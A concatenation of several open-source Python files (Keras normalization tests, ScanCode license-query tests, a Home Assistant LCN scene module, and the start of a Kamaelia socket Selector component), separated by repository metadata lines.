def test_combiner_computation_multi_value_axis(self, data, axis, expected):
combiner = normalization._NormalizingCombiner(axis=axis)
expected_accumulator = combiner._create_accumulator(**expected)
self.validate_accumulator_computation(combiner, data, expected_accumulator)
@parameterized.named_parameters(*_get_layer_computation_test_cases())
def test_layer_computation(self, adapt_data, axis, test_data, use_dataset,
expected):
input_shape = tuple([None for _ in range(test_data.ndim - 1)])
if use_dataset:
# Keras APIs expect batched datasets
adapt_data = dataset_ops.Dataset.from_tensor_slices(adapt_data).batch(
test_data.shape[0] // 2)
test_data = dataset_ops.Dataset.from_tensor_slices(test_data).batch(
test_data.shape[0] // 2)
cls = get_layer_class()
layer = cls(axis=axis)
layer.adapt(adapt_data)
input_data = keras.Input(shape=input_shape)
output = layer(input_data)
model = keras.Model(input_data, output)
model._run_eagerly = testing_utils.should_run_eagerly()
output_data = model.predict(test_data)
self.assertAllClose(expected, output_data)
def test_mean_setting_continued_adapt_failure(self):
if not context.executing_eagerly():
self.skipTest("'assign' doesn't work in V1, so don't test in V1.")
cls = get_layer_class()
layer = cls(axis=-1)
layer.build((2,))
layer.mean.assign([1.3, 2.0])
with self.assertRaisesRegex(RuntimeError, "without also setting 'count'"):
layer.adapt(np.array([[1, 2]]), reset_state=False)
def test_var_setting_continued_adapt_failure(self):
if not context.executing_eagerly():
self.skipTest("'assign' doesn't work in V1, so don't test in V1.")
cls = get_layer_class()
layer = cls(axis=-1)
layer.build((2,))
layer.variance.assign([1.3, 2.0])
with self.assertRaisesRegex(RuntimeError, "without also setting 'count'"):
layer.adapt(np.array([[1, 2]]), reset_state=False)
def test_weight_setting_continued_adapt_failure(self):
cls = get_layer_class()
layer = cls(axis=-1)
layer.build((2,))
layer.set_weights([np.array([1.3, 2.0]), np.array([0.0, 1.0]), np.array(0)])
with self.assertRaisesRegex(RuntimeError, "without also setting 'count'"):
layer.adapt(np.array([[1, 2]]), reset_state=False)
def test_weight_setting_no_count_continued_adapt_failure(self):
cls = get_layer_class()
layer = cls(axis=-1)
layer.build((2,))
layer.set_weights([np.array([1.3, 2.0]), np.array([0.0, 1.0])])
with self.assertRaisesRegex(RuntimeError, "without also setting 'count'"):
layer.adapt(np.array([[1, 2]]), reset_state=False)
if __name__ == "__main__":
test.main()
|
gunan/tensorflow
|
tensorflow/python/keras/layers/preprocessing/normalization_test.py
|
Python
|
apache-2.0
| 10,124
|
#
# Copyright (c) 2016 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, print_function
import os
from commoncode.testcase import FileBasedTesting
from licensedcode import index
from licensedcode.models import Rule
from licensedcode.query import Query
from licensedcode import models
TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
class IndexTesting(FileBasedTesting):
test_data_dir = TEST_DATA_DIR
def get_test_rules(self, base, subset=None):
base = self.get_test_loc(base)
test_files = sorted(os.listdir(base))
if subset:
test_files = [t for t in test_files if t in subset]
return [Rule(text_file=os.path.join(base, license_key), licenses=[license_key])
for license_key in test_files]
class TestQueryWithSingleRun(IndexTesting):
def test_Query_tokens_by_line_from_string(self):
rule_text = 'Redistribution and use in source and binary forms with or without modification are permitted'
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = '''
The
Redistribution and use in source and binary are permitted
Athena capital of Grece
Paris and Athene
Always'''
qry = Query(query_string=querys, idx=idx, _test_mode=True)
result = list(qry.tokens_by_line())
expected = [
[],
[None],
[11, 0, 6, 4, 3, 0, 1, 9, 2],
[],
[None, None, None, None],
[None, 0, None],
[None],
]
assert expected == result
# convert tid to actual token strings
qtbl_as_str = lambda qtbl: [[None if tid is None else idx.tokens_by_tid[tid] for tid in tids] for tids in qtbl]
result_str = qtbl_as_str(result)
expected_str = [
[],
[None],
['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted'],
[],
[None, None, None, None],
[None, 'and', None],
[None],
]
assert expected_str == result_str
assert [3, 3, 3, 3, 3, 3, 3, 3, 3, 6] == qry.line_by_pos
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = 'and this is not a license'
qry = Query(query_string=querys, idx=idx, _test_mode=True)
result = list(qry.tokens_by_line())
expected = [['and', None, None, None, None, None]]
assert expected == qtbl_as_str(result)
def test_Query_tokenize_from_string(self):
rule_text = 'Redistribution and use in source and binary forms with or without modification are permitted'
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = '''
The
Redistribution and use in source and binary are permitted.
Athena capital of Grece
Paris and Athene
Always'''
qry = Query(query_string=querys, idx=idx, _test_mode=True)
qry.tokenize_and_build_runs(qry.tokens_by_line())
# convert tid to actual token strings
tks_as_str = lambda tks: [None if tid is None else idx.tokens_by_tid[tid] for tid in tks]
expected = ['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', 'and']
result = tks_as_str(qry.tokens)
assert expected == result
expected = [None, 'redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', None, None, None, None, None, 'and', None, None]
result = tks_as_str(qry.tokens_with_unknowns())
assert expected == result
assert 1 == len(qry.query_runs)
qr1 = qry.query_runs[0]
assert 0 == qr1.start
assert 9 == qr1.end
assert 10 == len(qr1)
expected = ['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', 'and']
result = tks_as_str(qr1.tokens)
assert expected == result
expected = [None, 'redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', None, None, None, None, None, 'and']
result = tks_as_str(qr1.tokens_with_unknowns())
assert expected == result
def test_QueryRuns_tokens_with_unknowns(self):
rule_text = 'Redistribution and use in source and binary forms with or without modification are permitted'
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = '''
The
Redistribution and use in source and binary are permitted.
Athena capital of Grece
Paris and Athene
Always'''
qry = Query(query_string=querys, idx=idx)
assert set([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]) == set(qry.matchables)
assert 1 == len(qry.query_runs)
qrun = qry.query_runs[0]
# convert tid to actual token strings
tks_as_str = lambda tks: [None if tid is None else idx.tokens_by_tid[tid] for tid in tks]
expected = ['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', 'and']
assert expected == tks_as_str(qrun.tokens)
expected = [None, 'redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'are', 'permitted', None, None, None, None, None, 'and']
assert expected == tks_as_str(qrun.tokens_with_unknowns())
assert 0 == qrun.start
assert 9 == qrun.end
def test_QueryRun_does_not_end_with_None(self):
rule_text = 'Redistribution and use in source and binary forms, with or without modification, are permitted'
idx = index.LicenseIndex([Rule(_text=rule_text, licenses=['bsd'])])
querys = '''
The
Redistribution and use in source and binary forms, with or without modification, are permitted.
Always
bar
modification
foo
'''
# convert tid to actual token strings
tks_as_str = lambda tks: [None if tid is None else idx.tokens_by_tid[tid] for tid in tks]
qry = Query(query_string=querys, idx=idx)
expected = [
None,
'redistribution', 'and', 'use', 'in', 'source', 'and', 'binary',
'forms', 'with', 'or', 'without', 'modification', 'are', 'permitted',
None, None,
'modification',
None
]
assert [x for x in expected if x] == tks_as_str(qry.tokens)
assert expected == tks_as_str(qry.tokens_with_unknowns())
assert 2 == len(qry.query_runs)
qrun = qry.query_runs[0]
expected = ['redistribution', 'and', 'use', 'in', 'source', 'and', 'binary', 'forms', 'with', 'or', 'without', 'modification', 'are', 'permitted']
assert expected == tks_as_str(qrun.tokens)
assert 0 == qrun.start
assert 13 == qrun.end
qrun = qry.query_runs[1]
expected = ['modification']
assert expected == tks_as_str(qrun.tokens)
assert 14 == qrun.start
assert 14 == qrun.end
def test_Query_from_real_index_and_location(self):
idx = index.LicenseIndex(self.get_test_rules('index/bsd'))
query_loc = self.get_test_loc('index/querytokens')
qry = Query(location=query_loc, idx=idx, line_threshold=4)
result = [qr.to_dict() for qr in qry.query_runs]
expected = [
{'end': 35,
'start': 0,
'tokens': (u'redistribution and use in source and binary forms '
u'redistributions of source code must the this that is not '
u'to redistributions in binary form must this software is '
u'provided by the copyright holders and contributors as is')
},
{'end': 36, 'start': 36, 'tokens': u'redistributions'}]
assert expected == result
expected_lbp = [
4, 4, 4, 4, 4, 4, 4, 4, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 8,
9, 9, 9, 9, 9, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 15
]
assert expected_lbp == qry.line_by_pos
def test_query_and_index_tokens_are_identical_for_same_text(self):
rule_dir = self.get_test_loc('query/rtos_exact/')
from licensedcode.models import load_rules
idx = index.LicenseIndex(load_rules(rule_dir))
query_loc = self.get_test_loc('query/rtos_exact/gpl-2.0-freertos.RULE')
index_text_tokens = [idx.tokens_by_tid[t] for t in idx.tids_by_rid[0]]
qry = Query(location=query_loc, idx=idx, line_threshold=4)
wqry = qry.whole_query_run()
query_text_tokens = [idx.tokens_by_tid[t] for t in wqry.tokens]
assert index_text_tokens == query_text_tokens
assert u' '.join(index_text_tokens) == u' '.join(query_text_tokens)
def test_query_run_tokens_with_junk(self):
ranked_toks = lambda : ['the', 'is', 'a']
idx = index.LicenseIndex([Rule(_text='a is the binary')],
_ranked_tokens=ranked_toks)
assert 2 == idx.len_junk
assert {'a': 0, 'the': 1, 'binary': 2, 'is': 3, } == idx.dictionary
# two junks
q = Query(query_string='a the', idx=idx)
assert q.line_by_pos
qrun = q.query_runs[0]
assert [0, 1] == qrun.tokens
assert {} == qrun.query.unknowns_by_pos
# one junk
q = Query(query_string='a binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [0, 2] == qrun.tokens
assert {} == qrun.query.unknowns_by_pos
# one junk
q = Query(query_string='binary the', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2, 1] == qrun.tokens
assert {} == qrun.query.unknowns_by_pos
# one unknown at start
q = Query(query_string='that binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2] == qrun.tokens
assert {-1: 1} == qrun.query.unknowns_by_pos
# one unknown at end
q = Query(query_string='binary that', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2] == qrun.tokens
assert {0: 1} == qrun.query.unknowns_by_pos
# onw unknown in the middle
q = Query(query_string='binary that a binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2, 0, 2] == qrun.tokens
assert {0: 1} == qrun.query.unknowns_by_pos
# onw unknown in the middle
q = Query(query_string='a binary that a binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [0, 2, 0, 2] == qrun.tokens
assert {1: 1} == qrun.query.unknowns_by_pos
# two unknowns in the middle
q = Query(query_string='binary that was a binary', idx=idx)
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2, 0, 2] == qrun.tokens
assert {0: 2} == qrun.query.unknowns_by_pos
# unknowns at start, middle and end
q = Query(query_string='hello dolly binary that was a binary end really', idx=idx)
# u u u u u u
qrun = q.query_runs[0]
assert q.line_by_pos
assert [2, 0, 2] == qrun.tokens
assert {-1: 2, 0: 2, 2: 2} == qrun.query.unknowns_by_pos
def test_query_tokens_are_same_for_different_text_formatting(self):
test_files = [self.get_test_loc(f) for f in [
'queryformat/license2.txt',
'queryformat/license3.txt',
'queryformat/license4.txt',
'queryformat/license5.txt',
'queryformat/license6.txt',
]]
rule_file = self.get_test_loc('queryformat/license1.txt')
idx = index.LicenseIndex([Rule(text_file=rule_file, licenses=['mit'])])
q = Query(location=rule_file, idx=idx)
assert 1 == len(q.query_runs)
expected = q.query_runs[0]
for tf in test_files:
q = Query(tf, idx=idx)
qr = q.query_runs[0]
assert expected.tokens == qr.tokens
def test_query_run_unknowns(self):
idx = index.LicenseIndex([Rule(_text='a is the binary')])
assert {'a': 0, 'binary': 1, 'is': 2, 'the': 3} == idx.dictionary
assert 2 == idx.len_junk
# multiple unknowns at start, middle and end
q = Query(query_string='that new binary was sure a kind of the real mega deal', idx=idx)
# known pos 0 1 2
# abs pos 0 1 2 3 4 5 6 7 8 9 10 11
expected = {
- 1: 2,
0: 2,
1: 2,
2: 3,
}
assert expected == dict(q.unknowns_by_pos)
class TestQueryWithMultipleRuns(IndexTesting):
def test_query_runs_from_location(self):
idx = index.LicenseIndex(self.get_test_rules('index/bsd'))
query_loc = self.get_test_loc('index/querytokens')
qry = Query(location=query_loc, idx=idx, line_threshold=3)
result = [q.to_dict(brief=True) for q in qry.query_runs]
expected = [
{
'start': 0,
'end': 35,
'tokens': u'redistribution and use in source ... holders and contributors as is'},
{
'start': 36,
'end': 36,
'tokens': u'redistributions'}
]
assert expected == result
def test_query_runs_three_runs(self):
idx = index.LicenseIndex(self.get_test_rules('index/bsd'))
query_loc = self.get_test_loc('index/queryruns')
qry = Query(location=query_loc, idx=idx)
expected = [
{'end': 84,
'start': 0,
'tokens': u'the redistribution and use in ... 2 1 3 c 4'},
{'end': 97,
'start': 85,
'tokens': u'this software is provided by ... holders and contributors as is'},
{'end': 98, 'start': 98, 'tokens': u'redistributions'}
]
result = [q.to_dict(brief=True) for q in qry.query_runs]
assert expected == result
def test_QueryRun(self):
idx = index.LicenseIndex([Rule(_text='redistributions in binary form must redistributions in')])
qry = Query(query_string='redistributions in binary form must redistributions in', idx=idx)
qruns = qry.query_runs
assert 1 == len(qruns)
qr = qruns[0]
# test
result = [idx.tokens_by_tid[tid] for tid in qr.tokens]
expected = ['redistributions', 'in', 'binary', 'form', 'must', 'redistributions', 'in']
assert expected == result
def test_query_runs_text_is_correct(self):
test_rules = self.get_test_rules('query/full_text/idx',)
idx = index.LicenseIndex(test_rules)
query_loc = self.get_test_loc('query/full_text/query')
qry = Query(location=query_loc, idx=idx, line_threshold=3)
qruns = qry.query_runs
result = [[u'<None>' if t is None else idx.tokens_by_tid[t] for t in qr.tokens_with_unknowns()] for qr in qruns]
expected = [
u'<None> <None> <None> this'.split(),
u'''redistribution and use in source and binary forms with or
without modification are permitted provided that the following
conditions are met redistributions of source code must retain the
above copyright notice this list of conditions and the following
disclaimer redistributions in binary form must reproduce the above
copyright notice this list of conditions and the following
disclaimer in the documentation and or other materials provided with
the distribution neither the name of <None> inc nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission this
software is provided by the copyright holders and contributors as is
and any express or implied warranties including but not limited to
the implied warranties of merchantability and fitness for a
particular purpose are disclaimed in no event shall the copyright
owner or contributors be liable for any direct indirect incidental
special exemplary or consequential damages including but not limited
to procurement of substitute goods or services loss of use data or
profits or business interruption however caused and on any theory of
liability whether in contract strict liability or tort including
negligence or otherwise arising in any way out of the use of this
software even if advised of the possibility of such damage'''.split(),
u'no <None> of'.split(),
]
assert expected == result
def test_query_runs_with_plain_rule(self):
rule_text = u'''X11 License
Copyright (C) 1996 X Consortium Permission is hereby granted, free
of charge, to any person obtaining a copy of this software and
associated documentation files (the "Software"), to deal in the
Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom
the Software is furnished to do so, subject to the following
conditions: The above copyright notice and this permission notice
shall be included in all copies or substantial portions of the
Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE X CONSORTIUM BE LIABLE FOR
ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Except as contained in this notice, the name of the X Consortium
shall not be used in advertising or otherwise to promote the sale,
use or other dealings in this Software without prior written
authorization from the X Consortium. X Window System is a trademark
of X Consortium, Inc.
'''
rule = Rule(_text=rule_text, licenses=['x-consortium'])
idx = index.LicenseIndex([rule])
query_loc = self.get_test_loc('detect/simple_detection/x11-xconsortium_text.txt')
qry = Query(location=query_loc, idx=idx)
result = [q.to_dict(brief=False) for q in qry.query_runs]
expected = [{
'start': 0,
'end': 216,
'tokens':(
u'x11 license copyright c 1996 x consortium permission is hereby '
u'granted free of charge to any person obtaining a copy of this '
u'software and associated documentation files the software to deal in '
u'the software without restriction including without limitation the '
u'rights to use copy modify merge publish distribute sublicense and or '
u'sell copies of the software and to permit persons to whom the '
u'software is furnished to do so subject to the following conditions '
u'the above copyright notice and this permission notice shall be '
u'included in all copies or substantial portions of the software the '
u'software is provided as is without warranty of any kind express or '
u'implied including but not limited to the warranties of '
u'merchantability fitness for a particular purpose and noninfringement '
u'in no event shall the x consortium be liable for any claim damages or '
u'other liability whether in an action of contract tort or otherwise '
u'arising from out of or in connection with the software or the use or '
u'other dealings in the software except as contained in this notice the '
u'name of the x consortium shall not be used in advertising or '
u'otherwise to promote the sale use or other dealings in this software '
u'without prior written authorization from the x consortium x window '
u'system is a trademark of x consortium inc'
)
}]
assert 217 == len(qry.query_runs[0].tokens)
assert expected == result
def test_query_run_has_correct_offset(self):
rule_dir = self.get_test_loc('query/runs/rules')
rules = list(models.load_rules(rule_dir))
idx = index.LicenseIndex(rules)
query_doc = self.get_test_loc('query/runs/query.txt')
q = Query(location=query_doc, idx=idx, line_threshold=4)
result = [qr.to_dict() for qr in q.query_runs]
expected = [
{'end': 0, 'start': 0, 'tokens': u'inc'},
{
'end': 123,
'start': 1,
'tokens': (
u'this library is free software you can redistribute it and or modify '
u'it under the terms of the gnu library general public license as '
u'published by the free software foundation either version 2 of the '
u'license or at your option any later version this library is '
u'distributed in the hope that it will be useful but without any '
u'warranty without even the implied warranty of merchantability or '
u'fitness for a particular purpose see the gnu library general public '
u'license for more details you should have received a copy of the gnu '
u'library general public license along with this library see the file '
u'copying lib if not write to the free software foundation inc 51 '
u'franklin street fifth floor boston ma 02110 1301 usa'
)
}]
assert expected == result
class TestQueryWithFullIndex(FileBasedTesting):
test_data_dir = TEST_DATA_DIR
def test_query_from_binary_lkms_1(self):
location = self.get_test_loc('query/ath_pci.ko')
idx = index.get_index()
result = Query(location, idx=idx)
assert len(result.query_runs) < 15
def test_query_from_binary_lkms_2(self):
location = self.get_test_loc('query/eeepc_acpi.ko')
idx = index.get_index()
result = Query(location, idx=idx)
assert len(result.query_runs) < 500
qrs = result.query_runs[5:10]
assert any('license gpl' in u' '.join(idx.tokens_by_tid[t] for t in qr.matchable_tokens())
for qr in qrs)
def test_query_from_binary_lkms_3(self):
location = self.get_test_loc('query/wlan_xauth.ko')
idx = index.get_index()
result = Query(location, idx=idx)
assert len(result.query_runs) < 900
qr = result.query_runs[0]
assert 'license dual bsd gpl' in u' '.join(idx.tokens_by_tid[t] for t in qr.matchable_tokens())
def test_query_run_tokens(self):
query_s = u' '.join(u''' 3 unable to create proc entry license gpl
description driver author eric depends 2 6 24 19 generic smp mod module acpi
baridationally register driver proc acpi disabled acpi install notify acpi baridationally get
status cache caches create proc entry baridationally generate proc event acpi evaluate
object acpi remove notify remove proc entry acpi baridationally driver acpi acpi gcc gnu
4 2 3 ubuntu 4 2 3 gcc gnu 4 2 3 ubuntu 4 2 3 current stack pointer current
stack pointer this module end usr src modules acpi include linux include asm
include asm generic include acpi acpi c posix types 32 h types h types h h h
h h
'''.split())
idx = index.get_index()
result = Query(query_string=query_s, idx=idx)
assert 1 == len(result.query_runs)
qr = result.query_runs[0]
# NOTE: this is not a token present in any rules or licenses
unknown_token = u'baridationally'
assert unknown_token not in idx.dictionary
assert u' '.join([t for t in query_s.split() if t not in (unknown_token, 'proc')]) == u' '.join(idx.tokens_by_tid[t] for t in qr.tokens)
def test_query_run_tokens_matchable(self):
query_s = u' '.join(u'''
3 unable to create proc entry license gpl description driver author eric
depends 2 6 24 19 generic smp mod module acpi baridationally register driver
proc acpi disabled acpi install notify acpi baridationally get status cache
caches create proc entry baridationally generate proc event acpi evaluate
object acpi remove notify remove proc entry acpi baridationally driver acpi
acpi gcc gnu 4 2 3 ubuntu 4 2 3 gcc gnu 4 2 3 ubuntu 4 2 3 current stack
pointer current stack pointer this module end usr src modules acpi include
linux include asm include asm generic include acpi acpi c posix types 32 h
types h types h h h h h
'''.split())
idx = index.get_index()
result = Query(query_string=query_s, idx=idx)
assert 1 == len(result.query_runs)
qr = result.query_runs[0]
expected_qr0 = u' '.join(u'''
3 unable to create entry license gpl description driver author eric depends 2
6 24 19 generic smp mod module acpi register driver acpi disabled acpi
install notify acpi get status cache caches create entry generate event acpi
evaluate object acpi remove notify remove entry acpi driver acpi acpi gcc gnu
4 2 3 ubuntu 4 2 3 gcc gnu 4 2 3 ubuntu 4 2 3 current stack pointer current
stack pointer this module end usr src modules acpi include linux include asm
include asm generic include acpi acpi c posix types 32 h types h types h h h
h h
'''.split())
assert expected_qr0 == u' '.join(idx.tokens_by_tid[t] for t in qr.tokens)
# NOTE: this is not a token present in any rules or licenses
unknown_token = u'baridationally'
assert unknown_token not in idx.dictionary
assert expected_qr0 == u' '.join(idx.tokens_by_tid[t] for p, t in enumerate(qr.tokens) if p in qr.matchables)
expected = u'gpl'
assert expected == u' '.join(idx.tokens_by_tid[t] for p, t in enumerate(qr.tokens) if p in qr.high_matchables)
|
yasharmaster/scancode-toolkit
|
tests/licensedcode/test_query.py
|
Python
|
apache-2.0
| 28,212
|
"""Support for LCN scenes."""
import pypck
from homeassistant.components.scene import DOMAIN as DOMAIN_SCENE, Scene
from homeassistant.const import CONF_ADDRESS, CONF_DOMAIN, CONF_ENTITIES, CONF_SCENE
from . import LcnEntity
from .const import (
CONF_DOMAIN_DATA,
CONF_OUTPUTS,
CONF_REGISTER,
CONF_TRANSITION,
OUTPUT_PORTS,
)
from .helpers import get_device_connection
PARALLEL_UPDATES = 0
def create_lcn_scene_entity(hass, entity_config, config_entry):
"""Set up an entity for this domain."""
device_connection = get_device_connection(
hass, tuple(entity_config[CONF_ADDRESS]), config_entry
)
return LcnScene(entity_config, config_entry.entry_id, device_connection)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up LCN switch entities from a config entry."""
entities = []
for entity_config in config_entry.data[CONF_ENTITIES]:
if entity_config[CONF_DOMAIN] == DOMAIN_SCENE:
entities.append(create_lcn_scene_entity(hass, entity_config, config_entry))
async_add_entities(entities)
class LcnScene(LcnEntity, Scene):
"""Representation of a LCN scene."""
def __init__(self, config, entry_id, device_connection):
"""Initialize the LCN scene."""
super().__init__(config, entry_id, device_connection)
self.register_id = config[CONF_DOMAIN_DATA][CONF_REGISTER]
self.scene_id = config[CONF_DOMAIN_DATA][CONF_SCENE]
self.output_ports = []
self.relay_ports = []
for port in config[CONF_DOMAIN_DATA][CONF_OUTPUTS]:
if port in OUTPUT_PORTS:
self.output_ports.append(pypck.lcn_defs.OutputPort[port])
else: # in RELEAY_PORTS
self.relay_ports.append(pypck.lcn_defs.RelayPort[port])
if config[CONF_DOMAIN_DATA][CONF_TRANSITION] is None:
self.transition = None
else:
self.transition = pypck.lcn_defs.time_to_ramp_value(
config[CONF_DOMAIN_DATA][CONF_TRANSITION]
)
async def async_activate(self, **kwargs):
"""Activate scene."""
await self.device_connection.activate_scene(
self.register_id,
self.scene_id,
self.output_ports,
self.relay_ports,
self.transition,
)
|
w1ll1am23/home-assistant
|
homeassistant/components/lcn/scene.py
|
Python
|
apache-2.0
| 2,350
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FIXME: This doesn't really provide a means for people to ask for
# the service and release the service. The problem this
# causes is that the selector has no simple means of shutting
# down when no one is using it.
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
"""\
======================================
NOTIFICATION OF SOCKET AND FILE EVENTS
======================================
The Selector component listens for events on sockets and sends out notifications.
It is effectively a wrapper around the unix 'select' statement. Components
request that the Selector component notify them when a supplied socket or file
object is ready.
The selectorComponent is a service that registers with the Coordinating
Assistant Tracker (CAT).
NOTE: The behaviour and API of this component changed in Kamaelia 0.4 and is
likely to change again in the near future.
Example Usage
-------------
See the source code for TCPClient for an example of how the Selector component
can be used.
How does it work?
-----------------
Selector is a service. Obtain it by calling the static method
Selector.getSelectorService(...). Any existing instance will be returned,
otherwise a new one is automatically created.
This component ignores anything sent to its "inbox" and "control" inboxes. This
component does not terminate.
Register socket or file objects with the selector, to receive a one-shot
notification when that file descriptor is ready. The file descriptor can be
a python file object or socket object. The notification is one-shot - meaning
you must resubmit your request every time you wish to receive a notification.
Ensure you deregister the file object when closing the file/socket. You may do
this even if you have already received the notification. The Selector component
will be unable to handle notifications for any other descriptors if it still has
a registered descriptor that has closed.
Register for a notification by sending an one of the following messages to the
"notify" inbox, as returned by Selector.getSelectorService():
* Kamaelia.KamaeliaIpc.newReader( (component,inboxname), descriptor)
* Kamaelia.KamaeliaIpc.newWriter( (component,inboxname), descriptor)
* Kamaelia.KamaeliaIpc.newExceptional( (component,inboxname), descriptor)
Choose which as appropriate:
* a newReader() request will notify when there is data ready to be read on
the descriptor
* a newWriter() request will notify when writing to the descriptor will not
block.
* a newExceptional() request will notify when an exceptional event occurs on
the specified descriptor.
Selector will notify the taret component by sending the file/socket descriptor
object to the target inbox the component provided. It then automatically
deregisters the descriptor, unlinking from the target component's inbox.
For a given descriptor for a given type of event (read/write/exceptional) only
one notification will be sent when the event occurs. If multiple notification
requests have been received, only the first is listened to; all others are
ignored.
Of course, once the notification as happened, or someone has requested that
descriptor be deregistered, then someone can register for it once again.
Deregister by sending on of the following messages to the "notify" inbox of
Selector:
* Kamaelia.KamaeliaIpc.removeReader( (component,inboxname), descriptor)
* Kamaelia.KamaeliaIpc.removeWriter( (component,inboxname), descriptor)
* Kamaelia.KamaeliaIpc.removeExceptional( (component,inboxname), descriptor)
It is advisable to send a deregister message when the corresponding file
descriptor closes, in case you registered for a notification, but it has not
occurred.
"""
import Axon
from Axon.Ipc import shutdown
import select, socket
from Kamaelia.IPC import newReader, removeReader, newWriter, removeWriter, newExceptional, removeExceptional
import Axon.CoordinatingAssistantTracker as cat
from Axon.ThreadedComponent import threadedadaptivecommscomponent
import time
#import sys,traceback
READERS,WRITERS, EXCEPTIONALS = 0, 1, 2
FAILHARD = False
timeout = 5
from Axon.Component import component
class _SelectorCore(threadedadaptivecommscomponent): #Axon.AdaptiveCommsComponent.AdaptiveCommsComponent): # SmokeTests_Selector.test_SmokeTest
"""\
Selector() -> new Selector component
Use Selector.getSelectorService(...) in preference as it returns an
existing instance, or automatically creates a new one.
"""
Inboxes = {
"control" : "Recieving a Axon.Ipc.shutdown() message here causes shutdown",
"inbox" : "Not used at present",
"notify" : "Used to be notified about things to select"
}
def __init__(self,notifySocket=None):
super(_SelectorCore, self).__init__()
self.minSelectables = 0
self.notifySocket = notifySocket
if self.notifySocket:
self.minSelectables += 1
def removeLinks(self, selectable, meta, selectables):
"""\
Removes a file descriptor (selectable).
Removes the corresponding entry from meta and selectables; unlinks from
the component to be notified; and deletes the corresponding outbox.
"""
# \
#print "removeLinks",selectable,meta,selectables
try:
replyService, outbox, Linkage = meta[selectable]
self.unlink(thelinkage=Linkage)
selectables.remove(selectable)
self.deleteOutbox(outbox)
del meta[selectable]
Linkage = None
except:
pass
def addLinks(self, replyService, selectable, meta, selectables, boxBase):
"""\
Adds a file descriptor (selectable).
Creates a corresponding outbox, with name based on boxBase; links it to
the component that wants to be notified; adds the file descriptor to the
set of selectables; and records the box and linkage info in meta.
"""
if selectable not in meta:
outbox = self.addOutbox(boxBase)
L = self.link((self, outbox), replyService)
meta[selectable] = replyService, outbox, L
selectables.append(selectable)
return L
else:
return meta[selectable][2]
def handleNotify(self, meta, readers,writers, exceptionals):
"""\
Process requests to add and remove file descriptors (selectables) that
arrive at the "notify" inbox.
"""
while self.dataReady("notify"):
message = self.recv("notify")
# \
#print type(message)
if isinstance(message, newReader):
replyService, selectable = message.object
L = self.addLinks(replyService, selectable, meta[READERS], readers, "readerNotify")
L.showtransit = 0
if isinstance(message, newWriter):
replyService, selectable = message.object
L = self.addLinks(replyService, selectable, meta[WRITERS], writers, "writerNotify")
L.showtransit = 0
if isinstance(message, newExceptional):
replyService, selectable = message.object
self.addLinks(replyService, selectable, meta[EXCEPTIONALS], exceptionals, "exceptionalNotify")
